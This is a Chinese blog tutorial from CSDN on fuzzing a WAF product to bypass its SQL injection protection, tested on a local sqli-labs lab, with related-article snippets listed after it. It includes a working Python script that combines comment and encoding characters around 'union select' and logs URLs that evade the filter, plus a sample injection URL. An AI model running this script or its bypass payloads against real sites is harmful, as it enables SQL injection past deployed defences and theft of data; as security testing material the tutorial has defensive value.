FUZZ测试某狗WAF绕过

最新推荐文章于 2024-04-10 09:32:05 发布
置顶 最新推荐文章于 2024-04-10 09:32:05 发布
阅读量6.4k 收藏 30
点赞数 11
分类专栏: 渗透之旅 Web安全 python开发 代码人生 Web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JBlock/article/details/88617906
版权
题记

Fuzz是安全测试的一种方法,也是极为重要的一种手段!当你面对waf无所适从的时候,这时候你就可以Fuzz模糊测试来绕过waf,甚至你可以发现一些意想不到的姿势!最近两天我会对fuzz测试进行介绍!主要内容是Fuzz脚本编写和Fuzz思路!如果你想,这里会有无数种姿势让你bypass!

文章目录

正文
环境准备

测试靶场:sqli-libs

安全软件:某狗最新版

首先安装配置安全狗,在此之前需要安装好phpstudy,和配置sqli-libs靶场,在此便不赘述!

在这里插入图片描述

把http防护打开,其它防护都关掉,以免影响我们测试!

在这里插入图片描述

因为我们进行本地测试,需要发送大量请求!这种情况会触发狗狗的cc防护和ddos防护,所以为了我们能大量得到payload!这里我们关闭IP黑名单和爬虫黑名单!

在这里插入图片描述

可以看到http防护已经全开!

FUZZ思路

我们的思路其实很简单!就是利用特殊字符和数字字母,特殊编码的字符遍历组合在一起进行模糊测试!这次我们利用内联注释来进行基础来进行fuzz,首先测试一下使用内联注释会不会被狗给拦了!

语句:

http://192.168.23.149/sqli/Less-1/?id=id=1/*!union*//*!select*/1,2,3

在这里插入图片描述

这时候还是会被狗拦了!所以我们可以发现安全狗对一般的注入还是有一定防护能力的!

接下来贴上我们的FUZZ脚本

# ! -*- encoding:utf-8 -*-

# python3
#比较全
# fuzz_zs = ['/*','*/','/*!','?','*','=','`','~','!','@','%','.','-','+','|','%00'.'%20' ,'%09', '%0a', '%0b', '%0c', '%0d' ,
# '%a0' ,'/**/']
# fuzz_sz = ['0','1','2','3','4','5','6','7','8','9']
# fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j","%0k","%0l","%0m","%0n",
# "%0o","%0p","%0q","%0r","%0s","%0t","%0u","%0v","%0w","%0x","%0y","%0z"]
import requests
#精简
fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00']

fuzz_sz = ['', ' ']

fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"]

fuzz = fuzz_zs + fuzz_sz + fuzz_ch

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0"}

url_start = "http://192.168.23.149/sqli/Less-1/?id=1"

for a in fuzz:

    for b in fuzz:

        for c in fuzz:

            for d in fuzz:

                exp = "/*!union" + a + b + c + d + "select*/ 1,2,3"

                url = url_start + exp

                res = requests.get(url=url, headers=headers)

                print("Now URL:" + url)

                if "Login" in res.text:
                    print("Find Fuzz bypass:" + url)

                    with open("H:ip.txt", 'a', encoding='utf-8') as r:
                        r.write(url + "\n")

这里我们使用精简的payload组合!因为组合起来真是太多了,我计算了一下请看图!

在这里插入图片描述

对!就是3个亿组合,这里才五层嵌套!我就跑了几秒!已经找到近千种bybass姿势了!

在这里插入图片描述

我们随便找一个!进行测试!

在这里插入图片描述

发现成功bypass!

接下来你可以继续手工注入!更方便的是你可以直接写一个sqlmap的tamper自动化注入~

后记

FUZZ作为一种重要的漏洞挖掘姿势!今天利用一个实例以及脚本编写对其进行介绍,这里你可以用成千上万种姿势绕过常规安全软件的软waf!下次我会就FUZZ测试流程以及FUZZ工具使用进行介绍!欢迎各位前来斧正!

JBlock
关注
  • 11
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sql_fuzz-检测waf过滤关键字字典.txt
09-26
非常全面的SQL注入关键字检测字典,检测网站waf过滤了哪些关键字的字典,配合burpsuit使用非常有效。
fuzzwaf
qq_41048303的博客
11-17 2004
fuzzwaf(SQL注入) 1.fuzz.py import requests import sys fuzz_zs = ['/*', '*/', '/*!', '/**/', '?', '/', '*', '=', '`', '!', '%', '.', '-', '+'] fuzz_sz = [''] fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j","%0k","%0l","%0m","
渗透测试-SQL注入之Fuzz绕过WAF
lza20001103的博客
04-21 4119
渗透测试-SQL注入之Fuzz绕过WAF
探索Google的FuzzBench:提升软件安全性的一站式模糊测试平台
最新发布
gitblog_00029的博客
04-10 223
探索Google的FuzzBench:提升软件安全性的一站式模糊测试平台 项目地址:https://gitcode.com/google/fuzzbench 在软件开发的世界中,确保代码的安全性和稳定性至关重要。为此,Google推出了开源项目FuzzBench,一个针对模糊测试Fuzzing)的基准测试和监控平台。本文将深入解析该项目的技术背景、功能特性,并探讨其如何助力开发者提高软件安全性...
Python攻防-Fuzz绕过安全狗进行SQL注入
道阻且长,行则将至。
04-19 3458
文章目录前言WAF部署WAF简述网站安全狗Fuzz脚本绕过Fuzz脚本脚本效果SQLMap绕过Fuzz关键词tamper绕过总结 前言 在渗透测试过程中,经常会遇到很多 Web 站点部署了 WAF,这个时候使用常规的 Payload 进行 XSS、SQL 注入的检测避免不了被 WAF 拦截阻断的命运。 Fuzz 模糊测试是一种有效的检测 WAF 过滤规则缺陷并尝试进行 WAF 绕过的技术,本文将以“PhpStudy+DVWA+ 安全狗v4.0”的实验环境演示 Fuzz 测试绕过 WAFWAF部署 我在
绕安全狗mysql_Fuzz绕过安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 284
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
【WEB安全】某waf实战SQL注入绕过fuzz过程
yijinbaiyi的博客
01-17 410
【WEB安全】某waf实战SQL注入绕过fuzz过程 #01 环境简介 服务器:windows2008 R2 软件:phpstudy20180211 php 5.4.45 mysql 5.5.53 某锁win_3.1.18.13服务端版本 #02 Fuzz过程 以基于union注入为例 fuzz order by 过程如下: ?id=1’ order --+ 不拦截 ?id=1’ order b...
Fuzz安全测试技术
05-08
Fuzz安全测试技术
api-fuzz:python restful api模糊测试
02-05
IntelliFuzzTest cli测试工具安装git clone https://github.com/smasterfree/api-fuzz.gitpip install -r requirements.txt快速开始将curl请求体放进request.txt文件中,执行命令python IntelliFuzzTest_cli.py ...
附录:WAF自动化FUZZ脚本1
08-03
附录:WAF自动化FUZZ脚本1
fuzz.rar(模糊测试工具)
03-03
Fuzz是世界上第一款Fuzzing工具,也是该技术称之为‘fuzzing’的原因,它是威斯康星大学研究所测试windows程序的工具。该工具利用windows的消息机制向窗口随机的发送数据,试图使得应用程序崩溃。
Fuzz安全狗注入绕过
weixin_30367543的博客
06-25 182
安全狗版本为: apache 4.0 网站为: php+mysql 系统: win 2003 这里只要是fuzz /*!union 跟 select*/ 之间的内容: /*!union<FUZZ_HERE>select*/ 位置很多可以选择。 脚本语言你可以用你喜欢的, 我这里用perl6 让我们一步步来。 枸造 exp 我用如下代...
mysql注入fuzz字典_Fuzz安全狗注入绕过
weixin_33946174的博客
01-28 430
安全狗版本为: apache 4.0网站为: php+mysql系统: win 2003这里只要是fuzz /*!union 跟 select*/ 之间的内容:/*!unionselect*/位置很多可以选择。脚本语言你可以用你喜欢的, 我这里用perl6让我们一步步来。枸造 exp 我用如下代码(代码测试用):#!/bin/env perl6my @fuzz_sp = '/*','*/','/*...
从SQL注入绕过最新安全狗WAF中学习fuzz
include_voidmain的博客
06-14 320
从SQL注入绕过最新安全狗WAF中学习fuzz
WFUZZ使用教程
热门推荐
JBlock的博客
03-17 2万+
文章目录简介Wfuzz基本功爆破文件、目录遍历枚举参数值POST请求测试Cookie测试HTTP Headers测试测试HTTP请求方法(Method)使用代理认证递归测试并发和间隔保存测试结果Wfuzz高阶功法IteratorszipchainproductEncoders**使用多个Encoder:**Scripts使用Scripts自定义插件技巧网络异常超时结合BurpSuite过滤器字典 ...
CTF命令执行及绕过技巧
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
大话FUZZ测试
JBlock的博客
03-17 1万+
前言 在此之前我已经分享了关于FUZZ的两篇文章,一篇是关于FUZZ某狗进行SQL注入,一篇是关于一款经典工具WFUZZ的使用!今天我就FUZZ测试流程进行简单分析!欢迎各位斧正! 文章目录前言正文FUZZ敏感目录御剑DirsearchDirbWFUZZ参数FUZZPayload FUZZ**栗子****关于字典****结语** 正文 核心思想 目录Fuzz( base ) 参数Fuzz Pa...
PHP代码审计之函数漏洞(上)
JBlock的博客
03-13 5427
前言 此篇文件属于代码审计篇的一个环节,其意图是为总结php常见函数漏洞分为上下两节,此为上节!此篇与命令注入绕过篇和sql注入回顾篇同属一个系列!欢迎各位斧正! 文章目录前言正文intval()使用不当导致安全漏洞的分析switch()in_array()PHP弱类型的特性&quot;.&quot;被替换成&quot;_&quot;unsetserialize 和 unserialize漏洞session 反序列化漏洞MD5 comp...
什么是接口fuzz测试
06-09
接口fuzz测试是一种测试方法,用于检测应用程序或系统接口中的漏洞和错误。它通过自动化的方式向接口发送大量的随机数据和非法输入,来测试系统的鲁棒性和安全性。接口fuzz测试可以帮助发现许多常见的漏洞,例如缓冲区溢出、SQL注入、跨站点脚本攻击等。此外,接口fuzz测试还可以帮助发现系统中的性能问题和异常情况。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值